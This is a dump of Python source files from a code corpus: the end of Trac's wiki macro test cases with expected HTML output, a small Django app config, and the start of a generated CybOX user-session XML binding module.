============================== htdocs: Image, nolink
[[Image(htdocs:trac_logo.png, nolink)]]
------------------------------
<p>
<img src="/chrome/site/trac_logo.png" alt="trac_logo.png" title="trac_logo.png" />
</p>
============================== shared: Image, nolink
[[Image(shared:trac_logo.png, nolink)]]
------------------------------
<p>
<img src="/chrome/shared/trac_logo.png" alt="trac_logo.png" title="trac_logo.png" />
</p>
==============================
[[Image("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=")]]
------------------------------
<p>
<a style="padding:0; border:none" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII="><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" alt="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" title="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" /></a>
</p>
==============================
[[Image("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=", nolink)]]
------------------------------
<p>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" alt="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" title="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" />
</p>
============================== InterWiki
[[Image(shields:travis/edgewall/trac.svg, link=trac:source:/trunk)]]
[[Image(travis:edgewall/trac.svg:1.0-stable, link=trac:source:/branches/1.0-stable)]]
------------------------------
<p>
<a style="padding:0; border:none" href="http://trac.edgewall.org/intertrac/source%3A/trunk"><img src="https://img.shields.io/travis/edgewall/trac.svg" alt="travis/edgewall/trac.svg in shields" title="travis/edgewall/trac.svg in shields" /></a>
<a style="padding:0; border:none" href="http://trac.edgewall.org/intertrac/source%3A/branches/1.0-stable"><img src="https://travis-ci.org/edgewall/trac.svg?branch=1.0-stable" alt="edgewall/trac.svg:1.0-stable in travis" title="edgewall/trac.svg:1.0-stable in travis" /></a>
</p>
============================== InterWiki, nolink
[[Image(shields:pypi/dm/trac.svg, nolink)]]
------------------------------
<p>
<img src="https://img.shields.io/pypi/dm/trac.svg" alt="pypi/dm/trac.svg in shields" title="pypi/dm/trac.svg in shields" />
</p>
==============================
[[Image(notfound.png, nolink)]]
------------------------------
<p>
<img src="http://assets.example.org/common/attachment.png" alt="No image "notfound.png" attached to WikiStart" title="No image "notfound.png" attached to WikiStart" />
</p>
"""
# Note: in the <img> src attribute above, the Unicode characters
# within the URI sometimes come out as %-encoded, sometimes raw
# (server-relative case). Both forms are valid (at least
# according to the W3C XHTML validator).
# == [[TitleIndex]]
def titleindex_teardown(tc):
tc.env.reset_db()
TITLEINDEX1_MACRO_TEST_CASES = u"""
============================== TitleIndex, default format
[[TitleIndex()]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex]]
============================== TitleIndex, compact format
[[TitleIndex(format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiStart">WikiStart</a>
</p>
------------------------------
[[TitleIndex(...)]]
"""
TITLEINDEX2_MACRO_TEST_CASES = u"""
============================== TitleIndex, default format
[[TitleIndex()]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiEnd">WikiEnd</a></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex]]
============================== TitleIndex, compact format
[[TitleIndex(format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiEnd">WikiEnd</a>, <a href="/wiki/WikiStart">WikiStart</a>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, default format with prefix
[[TitleIndex(Wiki)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiEnd">WikiEnd</a></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, compact format with prefix
[[TitleIndex(Wiki,format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiEnd">WikiEnd</a>, <a href="/wiki/WikiStart">WikiStart</a>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, default format with prefix hidden
[[TitleIndex(Wiki,hideprefix)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiEnd">End</a></li><li><a href="/wiki/WikiStart">Start</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, compact format with prefix hidden
[[TitleIndex(Wiki,hideprefix,format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiEnd">End</a>, <a href="/wiki/WikiStart">Start</a>
</p>
------------------------------
[[TitleIndex(...)]]
"""
def titleindex2_setup(tc):
add_pages(tc, ['WikiEnd'])
TITLEINDEX3_MACRO_TEST_CASES = u"""
============================== TitleIndex, group format
[[TitleIndex(Wiki,format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>Wiki</strong><ul><li><strong>End</strong><ul><li><a href="/wiki/WikiEnd/First">WikiEnd/First</a></li><li><a href="/wiki/WikiEnd/Second">WikiEnd/Second</a></li></ul></li><li><strong>Start</strong><ul><li><a href="/wiki/WikiStart">WikiStart</a></li><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></li></ul></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, hierarchy format
[[TitleIndex(WikiStart/, format=hierarchy)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li>WikiStart<ul><li><a href="/wiki/WikiStart/First">First</a></li><li><a href="/wiki/WikiStart/Second">Second</a></li><li><a href="/wiki/WikiStart/Third">Third</a></li></ul></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, group format, prefix hidden
[[TitleIndex(Wiki,hideprefix,format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>End</strong><ul><li><a href="/wiki/WikiEnd/First">End/First</a></li><li><a href="/wiki/WikiEnd/Second">End/Second</a></li></ul></li><li><strong>Start</strong><ul><li><a href="/wiki/WikiStart">Start</a></li><li><a href="/wiki/WikiStart/First">Start/First</a></li><li><a href="/wiki/WikiStart/Second">Start/Second</a></li><li><a href="/wiki/WikiStart/Third">Start/Third</a></li></ul></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, hierarchy format, prefix hidden
[[TitleIndex(WikiStart/,hideprefix,format=hierarchy)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">First</a></li><li><a href="/wiki/WikiStart/Second">Second</a></li><li><a href="/wiki/WikiStart/Third">Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix
[[TitleIndex(../../WikiStart)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart">WikiStart</a></li><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix with trailing slash
[[TitleIndex(../../WikiStart/)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix ..
[[TitleIndex(..)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart">WikiStart</a></li><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix ../
[[TitleIndex(../)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix .
[[TitleIndex(.)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix ./
[[TitleIndex(./)]]
------------------------------
<p>
</p><div class="titleindex"><ul></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative hidden prefix ../
[[TitleIndex(../,hideprefix)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">First</a></li><li><a href="/wiki/WikiStart/Second">Second</a></li><li><a href="/wiki/WikiStart/Third">Third</a></li></ul></div><p>
</p>
------------------------------
"""
def titleindex3_setup(tc):
add_pages(tc, [
'WikiStart/First',
'WikiStart/Second',
'WikiStart/Third',
'WikiEnd/First',
'WikiEnd/Second',
])
TITLEINDEX4_MACRO_TEST_CASES = u"""
============================== TitleIndex group and page with numbers (#7919)
[[TitleIndex(format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>0.11</strong><ul><li><strong>Group</strong><ul><li><a href="/wiki/0.11/GroupOne">0.11/GroupOne</a></li><li><a href="/wiki/0.11/GroupTwo">0.11/GroupTwo</a></li></ul></li><li><a href="/wiki/0.11/Test">0.11/Test</a></li></ul></li><li><strong>Test</strong><ul><li><strong>0.11</strong><ul><li><a href="/wiki/Test0.11/Abc">Test0.11/Abc</a></li><li><a href="/wiki/Test0.11Abc">Test0.11Abc</a></li></ul></li><li><strong>0.12</strong><ul><li><a href="/wiki/Test0.12Def">Test0.12Def</a></li><li><a href="/wiki/Test0.12Ijk">Test0.12Ijk</a></li></ul></li><li><strong>0.13</strong><ul><li><a href="/wiki/Test0.13alpha">Test0.13alpha</a></li><li><a href="/wiki/Test0.13beta">Test0.13beta</a></li></ul></li><li><a href="/wiki/Test0.131">Test0.131</a></li><li><a href="/wiki/Test2">Test2</a></li><li><a href="/wiki/TestTest">TestTest</a></li><li><a href="/wiki/TestThing">TestThing</a></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, compact format with prefix hidden, including Test0.13*
[[TitleIndex(Test,format=compact,include=*0.13*)]]
------------------------------
<p>
<a href="/wiki/Test0.131">Test0.131</a>, <a href="/wiki/Test0.13alpha">Test0.13alpha</a>, <a href="/wiki/Test0.13beta">Test0.13beta</a>
</p>
------------------------------
============================== TitleIndex, compact format with prefix hidden, including Test0.13* but excluding Test0.131
[[TitleIndex(Test,format=compact,include=*0.13*,exclude=*1)]]
------------------------------
<p>
<a href="/wiki/Test0.13alpha">Test0.13alpha</a>, <a href="/wiki/Test0.13beta">Test0.13beta</a>
</p>
------------------------------
============================== TitleIndex, compact format, excluding various topics
[[TitleIndex(Test,format=compact,exclude=Test0.13*:*0.11*:Test2:Test*i*)]]
------------------------------
<p>
<a href="/wiki/Test0.12Def">Test0.12Def</a>, <a href="/wiki/Test0.12Ijk">Test0.12Ijk</a>, <a href="/wiki/TestTest">TestTest</a>
</p>
------------------------------
============================== TitleIndex, compact format, including and excluding various topics
[[TitleIndex(format=compact,include=*Group*:test2,exclude=*One)]]
------------------------------
<p>
<a href="/wiki/0.11/GroupTwo">0.11/GroupTwo</a>
</p>
------------------------------
"""
def titleindex4_setup(tc):
add_pages(tc, [
'TestTest',
'TestThing',
'Test2',
'Test0.11Abc',
'Test0.11/Abc',
'Test0.12Def',
'Test0.12Ijk',
'Test0.13alpha',
'Test0.13beta',
'Test0.131',
'0.11/Test',
'0.11/GroupOne',
'0.11/GroupTwo',
])
TITLEINDEX5_MACRO_TEST_CASES = u"""
============================== TitleIndex, hierarchy format with complex hierarchy
[[TitleIndex(format=hierarchy)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/TracDev">TracDev</a><ul><li><a href="/wiki/TracDev/ApiChanges">ApiChanges</a><ul><li><a href="/wiki/TracDev/ApiChanges/0.10">0.10</a></li><li><a href="/wiki/TracDev/ApiChanges/0.11">0.11</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12">0.12</a><ul><li>Missing<ul><li><a href="/wiki/TracDev/ApiChanges/0.12/Missing/Exists">Exists</a></li></ul></li></ul></li></ul></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, hierarchy format with complex hierarchy (and min=5)
[[TitleIndex(format=hierarchy,min=5)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/TracDev">TracDev</a><ul><li><a href="/wiki/TracDev/ApiChanges">ApiChanges</a></li><li><a href="/wiki/TracDev/ApiChanges/0.10">ApiChanges/0.10</a></li><li><a href="/wiki/TracDev/ApiChanges/0.11">ApiChanges/0.11</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12">ApiChanges/0.12</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12/Missing/Exists">ApiChanges/0.12/Missing/Exists</a></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, group format with complex hierarchy
[[TitleIndex(format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>TracDev</strong><ul><li><a href="/wiki/TracDev">TracDev</a></li><li><strong>ApiChanges</strong><ul><li><a href="/wiki/TracDev/ApiChanges">TracDev/ApiChanges</a></li><li><a href="/wiki/TracDev/ApiChanges/0.10">TracDev/ApiChanges/0.10</a></li><li><a href="/wiki/TracDev/ApiChanges/0.11">TracDev/ApiChanges/0.11</a></li><li><strong>0.12</strong><ul><li><a href="/wiki/TracDev/ApiChanges/0.12">TracDev/ApiChanges/0.12</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12/Missing/Exists">TracDev/ApiChanges/0.12/Missing/Exists</a></li></ul></li></ul></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
"""
def titleindex5_setup(tc):
add_pages(tc, [
'TracDev',
'TracDev/ApiChanges',
'TracDev/ApiChanges/0.10',
'TracDev/ApiChanges/0.11',
'TracDev/ApiChanges/0.12',
'TracDev/ApiChanges/0.12/Missing/Exists',
])
RECENTCHANGES_MACRO_TEST_CASES = u""""
============================== RecentChanges, group option
[[RecentChanges()]]
[[RecentChanges(group=date)]]
[[RecentChanges(group=none)]]
[[RecentChanges(,2,group=none)]]
[[RecentChanges(Wiki,group=none)]]
[[RecentChanges(Wiki,1,group=none)]]
------------------------------
<p>
</p><div><h3>%(date)s</h3><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><h3>%(date)s</h3><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li></ul></div><p>
</p>
------------------------------
"""
def recentchanges_setup(tc):
def add_pages(tc, names):
for name in names:
now = datetime.now(utc)
w = WikiPage(tc.env)
w.name = name
w.text = '--'
w.save('joe', 'the page ' + name, '::1', now)
add_pages(tc, [
'WikiMid',
'WikiEnd',
])
tc.correct = tc.correct % {'date': format_date(tzinfo=utc,
locale=locale_en)}
def recentchanges_teardown(tc):
tc.env.reset_db()
TRACINI_MACRO_TEST_CASES = u"""\
============================== TracIni, option with empty doc (#10940)
[[TracIni(section-42)]]
------------------------------
<p>
</p><div class="tracini">\
<h3 id="section-42-section"><code>[section-42]</code></h3>\
<table class="wiki"><tbody>\
<tr class="even"><td><code>option1</code></td><td></td><td class="default"><code>value</code></td></tr>\
<tr class="odd"><td><code>option2</code></td><td>blah</td><td class="default"><code>value</code></td></tr>\
</tbody></table>\
</div><p>
</p>
------------------------------
============================== TracIni, list option with sep=| (#11074)
[[TracIni(section-list)]]
------------------------------
<p>
</p><div class="tracini">\
<h3 id="section-list-section"><code>[section-list]</code></h3>\
<table class="wiki"><tbody>\
<tr class="even"><td><code>option1</code></td><td></td><td class="default"><code>4.2|42|42||0|enabled</code></td></tr>\
</tbody></table>\
</div><p>
</p>
------------------------------
============================== TracIni, option with "false" value as default
[[TracIni(section-def)]]
------------------------------
<p>
</p><div class="tracini">\
<h3 id="section-def-section"><code>[section-def]</code></h3>\
<table class="wiki"><tbody>\
<tr class="even"><td><code>option1</code></td><td></td><td class="nodefault">(no default)</td></tr>\
<tr class="odd"><td><code>option2</code></td><td></td><td class="nodefault">(no default)</td></tr>\
<tr class="even"><td><code>option3</code></td><td></td><td class="default"><code>0</code></td></tr>\
<tr class="odd"><td><code>option4</code></td><td></td><td class="default"><code>disabled</code></td></tr>\
<tr class="even"><td><code>option5</code></td><td></td><td class="nodefault">(no default)</td></tr>\
</tbody></table>\
</div><p>
</p>
------------------------------
"""
def tracini_setup(tc):
tc._orig_registry = Option.registry
class Foo(object):
option_a1 = (Option)('section-42', 'option1', 'value', doc='')
option_a2 = (Option)('section-42', 'option2', 'value', doc='blah')
option_l1 = (ListOption)('section-list', 'option1',
[4.2, '42', 42, None, 0, True], sep='|',
keep_empty=True)
option_d1 = (Option)('section-def', 'option1', None)
option_d2 = (Option)('section-def', 'option2', '')
option_d3 = (IntOption)('section-def', 'option3', 0)
option_d4 = (BoolOption)('section-def', 'option4', False)
option_d5 = (ListOption)('section-def', 'option5', [])
def tracini_teardown(tc):
Option.registry = tc._orig_registry
def suite():
suite = unittest.TestSuite()
suite.addTest(formatter.suite(IMAGE_MACRO_TEST_CASES, file=__file__,
setup=image_setup,
teardown=image_teardown))
suite.addTest(formatter.suite(TITLEINDEX1_MACRO_TEST_CASES, file=__file__))
suite.addTest(formatter.suite(TITLEINDEX2_MACRO_TEST_CASES, file=__file__,
setup=titleindex2_setup,
teardown=titleindex_teardown))
suite.addTest(formatter.suite(TITLEINDEX3_MACRO_TEST_CASES, file=__file__,
setup=titleindex3_setup,
teardown=titleindex_teardown,
context=('wiki', 'WikiStart/Second')))
suite.addTest(formatter.suite(TITLEINDEX4_MACRO_TEST_CASES, file=__file__,
setup=titleindex4_setup,
teardown=titleindex_teardown))
suite.addTest(formatter.suite(TITLEINDEX5_MACRO_TEST_CASES, file=__file__,
setup=titleindex5_setup,
teardown=titleindex_teardown))
suite.addTest(formatter.suite(RECENTCHANGES_MACRO_TEST_CASES, file=__file__,
setup=recentchanges_setup,
teardown=recentchanges_teardown))
suite.addTest(formatter.suite(TRACINI_MACRO_TEST_CASES, file=__file__,
setup=tracini_setup,
teardown=tracini_teardown))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 48.013201 | 991 | 0.568429 |
7b7de9d07345e10819860d65a9073b57359f573c | 102 | py | Python | full_inventory/apps.py | eisnerh/DjangoInventory | 8abf348a26984f5010feb080352cd05f5d3c04ff | [
"Apache-2.0"
] | null | null | null | full_inventory/apps.py | eisnerh/DjangoInventory | 8abf348a26984f5010feb080352cd05f5d3c04ff | [
"Apache-2.0"
] | null | null | null | full_inventory/apps.py | eisnerh/DjangoInventory | 8abf348a26984f5010feb080352cd05f5d3c04ff | [
"Apache-2.0"
] | null | null | null | from django.apps import AppConfig
class FullInventoryConfig(AppConfig):
name = 'full_inventory'
| 17 | 37 | 0.784314 |
5ec02121e571f64193ee14162fe28efbfbb43dbd | 34,890 | py | Python | cybox/bindings/user_session_object.py | siemens/python-cybox | b692a98c8a62bd696e2a0dda802ada7359853482 | [
"BSD-3-Clause"
] | null | null | null | cybox/bindings/user_session_object.py | siemens/python-cybox | b692a98c8a62bd696e2a0dda802ada7359853482 | [
"BSD-3-Clause"
] | null | null | null | cybox/bindings/user_session_object.py | siemens/python-cybox | b692a98c8a62bd696e2a0dda802ada7359853482 | [
"BSD-3-Clause"
] | 1 | 2019-04-16T18:37:32.000Z | 2019-04-16T18:37:32.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
#
# Generated Tue Apr 09 11:13:56 2013 by generateDS.py version 2.9a.
#
import sys
import getopt
import re as re_
import cybox_common
import base64
from datetime import datetime, tzinfo, timedelta
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser(huge_tree=True)
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(tzinfo):
def __init__(self, offset, name):
self.__offset = timedelta(minutes = offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if isinstance(input_data, basestring):
return input_data
if input_data.microsecond == 0:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S')
else:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S.%f')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_datetime(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
return dt.replace(tzinfo = tz)
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
if isinstance(input_data, basestring):
return input_data
_svalue = input_data.strftime('%Y-%m-%d')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_date(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
return datetime.strptime(input_data,
'%Y-%m-%d').replace(tzinfo = tz)
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
